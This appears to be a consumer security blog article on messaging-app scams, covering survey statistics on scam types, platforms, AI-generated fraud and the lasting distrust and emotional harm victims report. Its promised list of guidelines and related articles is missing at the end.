A delivery notification, a bank alert, a message from a merchant you ordered from last week — messaging apps permeate every aspect of everyday life, making such interactions completely normal. An attack shouldn’t feel like an attack. It should feel like the same message you’ve received hundreds of times.
It’s no surprise that scammers focus their attention on this method of communication first and foremost. The most popular platforms for scams are predictable: WhatsApp (43%), SMS/iMessage (40%), Facebook (27%), Telegram (22%), and Instagram (19%) — these are the ones that people trust most.
A wide variety of schemes is used. Brand impersonation is now one of the three most common types of messaging scam worldwide — accounting for 31% of cases. Fake delivery notifications top the list at 38%, followed by investment scams at 37%.
At the same time, nearly two-thirds (63%) of fraudulent schemes span multiple platforms, moving from SMS to WhatsApp, from WhatsApp to Telegram, etc. In this way, scammers achieve two goals: they mimic organic messaging and evade moderation algorithms.
Just a couple of years ago, fraudulent messages gave themselves away with bad grammar, awkward phrasing, illogical requests, and an obsessive sense of urgency. Today, a phishing message looks, sounds, and reads just like the real thing.
Scam cartels want to catch people in motion — between meetings, on a commute, or during everyday tasks — when your attention is already fragmented. They mimic your mother’s turn of phrase. They match your bank’s tone of voice. They copy your courier’s format exactly. They mirror the rhythm, structure, and style of authentic brand communications across messaging platforms. And AI is accelerating all of it.
What this creates is overlap. Legitimate and fraudulent messages appear in the same environment, using the same formats, language, and triggers. The difference between them is no longer obvious.
The data shows that two-thirds of victims (66%) believe AI was used in the scam against them, 42% cite messages written by AI, 31% report generated or cloned voices, and 25% encountered deepfake images or videos.
That’s why mere awareness and “tech-savviness” may no longer be enough to protect oneself. From Gen Z to Gen X, messaging scams cut across every generation.
But money is far from the only problem a victim is left with after an attack. After what they’ve been through, people develop distrust toward incoming messages, unfamiliar numbers, and any requests for action. As a result, 99% of fraud victims say they no longer trust incoming notifications in messaging apps.
This creates a crisis of trust in all digital channels in general. Every legitimate message can now be perceived as a scam. Brands, banks, and delivery services are forced to operate in an environment where the customer is, by default, in a state of distrust.
Dr. Elizabeth Carter, a forensic linguist and criminologist at Kingston University in London, notes that scammers use familiar contexts, common social settings and embedded linguistic norms to create the illusion for the victim that their decision-making is rational and reasonable in the moment. However, what is actually happening is that they construct false realities in which those decisions end up causing financial and psychological harm. She also notes that it is very hard to identify a false reality while you are in it.
After realizing they had been deceived, more than half of victims felt anger — the kind that comes from having trusted something and discovering it was used against you. 42% of victims report frustration, 38% — feeling upset. Moreover, several months later, these feelings haven’t gone away: nearly half of all victims (48%) are still angry, a third (33%) remain frustrated, and 30% are upset.
And nearly one in 10 victims don’t tell anyone what happened. They feel shame, a sense of having fallen for something so obvious. This leaves a significant portion of the actual damage unreported: only 24% of victims contact the police, and only 23% report it to their bank.
The crisis of trust — and even a touch of paranoia — that has arisen due to widespread attacks on users can linger in victims’ minds for a long time, affecting their quality of life. To prevent this, follow these guidelines:
We’ve covered other threats in messaging apps in similar articles:



